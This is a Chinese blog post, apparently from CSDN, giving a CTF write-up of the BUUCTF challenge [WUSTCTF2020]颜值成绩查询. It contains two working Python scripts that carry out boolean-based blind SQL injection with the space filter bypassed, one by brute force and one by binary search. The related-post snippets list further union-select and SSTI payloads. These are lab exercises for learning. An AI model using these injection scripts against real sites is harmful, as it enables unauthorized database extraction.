[WUSTCTF2020]颜值成绩查询

最新推荐文章于 2024-06-10 21:32:02 发布
最新推荐文章于 2024-06-10 21:32:02 发布
阅读量206 收藏
点赞数
分类专栏: BUUCTF 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CyhDl666/article/details/115670738
版权
  • sql注入的布尔盲注 过滤了空格
  • 直接交exp
import requests
url = "http://8eda0aa2-9a0e-4fd3-93c1-f3face942c15.node3.buuoj.cn/"
payload =r"_-abcdefghijkmlnopqrstuvwxzy{}123456789!@#$%^&(),"
flag = ""
def colounm():
    for i in range(1,50):
        for j in payload:
            #db_url = url + "?stunum=if((select(substr(group_concat(table_name),{},1))from/**/information_schema.tables/**/where/**/table_schema=database())='{}',1,2)".format(i,j)
            #db_url = url + "?stunum=if((select(substr(group_concat(column_name),{},1))from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='flag')='{}',1,2)".format(i,j)
            db_url = url +"?stunum=if((select(substr(group_concat(value),{},1))from/**/flag)='{}',1,2)".format(i,j)
            r = requests.get(db_url)
            if "Hi admin" in r.text:
                global flag
                flag += j
                print(flag)
                break
if __name__=="__main__":
    print('start')
    colounm()
  • 我没写二分法的
  • 下面是wp的二分法的
import requests
import time

flag = ""
for i in range(1, 100):
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        payload = 'http://8eda0aa2-9a0e-4fd3-93c1-f3face942c15.node3.buuoj.cn/?stunum=1^(ascii(substr((select(group_concat(flag,0x2b,value))from(flag)),%d,1))>%d)' %(i,mid)
        res = requests.get(payload)

        if 'student number not exists' in res.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
        time.sleep(0.1)
    if (mid == 32 or mid == 127):
        break
    flag = flag + chr(mid)
    print(flag)
  • 快很多!
海上清辉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuoj WUSTCTF2020颜值成绩查询
pondzhang的专栏
04-18 384
经过测试判断为盲注,编译脚本如下: import requests #database length def get_database_length(): count = 0 while(1): url = "http://de626b0f-7c67-4a3f-b657-89451b2a9923.node3.buuoj.cn/?stunum=0^(length(...
[WUSTCTF2020]颜值成绩查询 1
qq_51553814的博客
08-22 643
[WUSTCTF2020]颜值成绩查询 1 解题 就是一个布尔盲注,尝试自己写了一下python脚本,磕磕绊绊最后还是写出来了 主要是学了一个二分法,理解了一下 import requests url="http://f8aed0d0-ab96-4a36-8022-2a70701fe282.node4.buuoj.cn:81/?stunum=" name='' for i in range(1,100): print(i) low=32 high=128 mid=(lo
[WUSTCTF2020]颜值成绩查询1
最新发布
alwtj的博客
06-10 351
又试了试报错闭合,联合注入之类的,结果输出的都是student number not exists.测试了一下从1输到了5,第五个显示 student number not exists.开局一个输入框,输入number查询成绩,还有2行报错,典型的sql注入题~没有出错,说明payload构建成功,那就开始写python代码~这段代码用了二分查找,开始执行~输入1 0 0 / 1 0 0。没有出错,说明空格被过滤了~获得flag,游戏结束~构造一下payload。
buuctf-[WUSTCTF2020]颜值成绩查询
2202_75317918的博客
10-01 485
当输入的学号不存在时,只会返回“student number not exists.”。猜测是盲注题,因为看不见其他的回显信息,初步想法是构造值为1或0的表达式来进行探测。发现功能就是输入一个学号,然后返回对应的成绩,就是一个简单的查询操作。如果不采用二分法,会跑的很慢。打开环境,随便输个1看看。
BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询
weixin_44016181的博客
10-12 243
BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询,两道buuctf的练习题。python脚本实现比较简单,模板化python真的不要太爽~~
[WUSTCTF2020]颜值成绩查询 --不会编程的崽
不会编程的崽的博客
03-17 873
sql注入 盲注
[WUSTCTF2020]颜值成绩查询 -wp
freerats的博客
08-05 579
改变参数stunum发现页面会发生变化。 通过尝试可知参数处有boolean盲注,0^1会出现1的内容,因此判断具有盲注。 写脚本跑一下: import requests url='http://57e002cb-19bd-4ceb-bc2a-6960ff6347ac.node3.buuoj.cn/index.php' flag='' for i in range(50): a = 32 b = 128 mid = (a+b)//2 while(a<b): .
[WUSTCTF2020]颜值成绩查询 布尔注入二分法
m0_64180167的博客
09-26 172
正确回显 100 错误 显示 not。发现回显了 我们可以开始编写脚本跑了。这道题很简单 就是sql注入。我们来学习一下如何写盲注脚本。接下来就是爆破表和字段了。我们使用二分法来写一遍。这里很显然就是盲注了。回显了 就拿这个去咯。
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 773
[WUSTCTF2020]颜值成绩查询(布尔注入)
re学习笔记(56)WUSTCTF – Re方向WP
12-21
文章以一系列WUSTCTF逆向工程挑战为例,展示了如何利用逆向工程技术来解密和获取隐藏的flag。 首先,让我们看看WUSTCTF的"re-Cr0ssFun"挑战。在这个问题中,作者使用了IDA64(Interactive Disassembler)来加载64位...
linux操作系统入门实验报告
03-09
**Linux操作系统入门实验报告** 本实验报告主要针对Linux操作系统的基础知识和操作技能进行阐述,旨在帮助初学者快速熟悉这一开源操作系统。实验过程中,我们将通过实际操作来了解和掌握Linux的基本命令行界面,...
Flash8help_cn.part4
01-13
Flash8help_cn.part4.共有6卷,须全部下载才能解压缩。flash 教程 帮助文档 动漫 计算机
23种设计模式汇集       
07-09
### 23种设计模式汇集知识点详解 #### 设计模式概览 设计模式是一套被反复使用、多数人知晓的、经过分类编目的、代码设计经验的总结。它描述了在软件设计过程中的一些不断重复发生的问题,以及该问题的解决方案。...
BUU SQL COURSE 1
CyhDl666的博客
03-12 3372
进入题目给了两个页面 一开始以为在注入点在登录页面 尝试了万能密码 和 各种闭合 没发现注入的方式 接着尝试了热点列表页面的注入 但是url上好像不存在注入 F12在net中找到了隐藏的url 访问content_detail.php?id=1页面构造payload ?id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# # admin、co.
Buuctf [第三章 web进阶]SSTI 20
CyhDl666的博客
03-19 1432
进入页面用arjun扫描一下有什么url参数 这道题是最基础的了 直接给payload前面的payload吧 {{''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls").read()')}} 页面返回:password is wrong: app bin boot dev etc home lib lib64 media m.
buuctf [pasecactf_2019]flask_ssti
CyhDl666的博客
03-18 1225
题目已经告诉是SSTI模板注入了 测试一下 做题时用""发现了过滤 fuzz一下 过滤了很多东西 想到去年打校赛自己未解出来的一题 结合题目提示 是个16进制转换 附上自己写的python脚本 code = "/proc/self/fd/1" ssti = "" length = len(code) for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:] print(ssti) 将下面内容转化为16进制 __class__.
[FBCTF2019]RCEService
CyhDl666的博客
04-14 691
文章目录解法一 %0A截断解法二:PHP利用PCRE回溯次数限制绕过某些安全限制 进入页面要求用json的格式上传命令 解法一 %0A截断 {"cmd":"ls"} 尝试cat 读取源码 发现被禁止了 尝试%0A绕过 cmd={%0A"cmd":"/bin/cat ../../../home/rceservice/flag"%0A} 写下自己的疑惑和解答 先把源码附上 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_R
[WUSTCTF2020]朴实无华
09-19
[WUSTCTF2020]朴实无华是一道CTF比赛的题目。根据给出的代码,该题目包含三个关卡。在第一个关卡中,如果传入的参数$num的整数值小于2020且大于2021,会输出一条特定的字符串。在第二个关卡中,如果传入的参数$md5的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值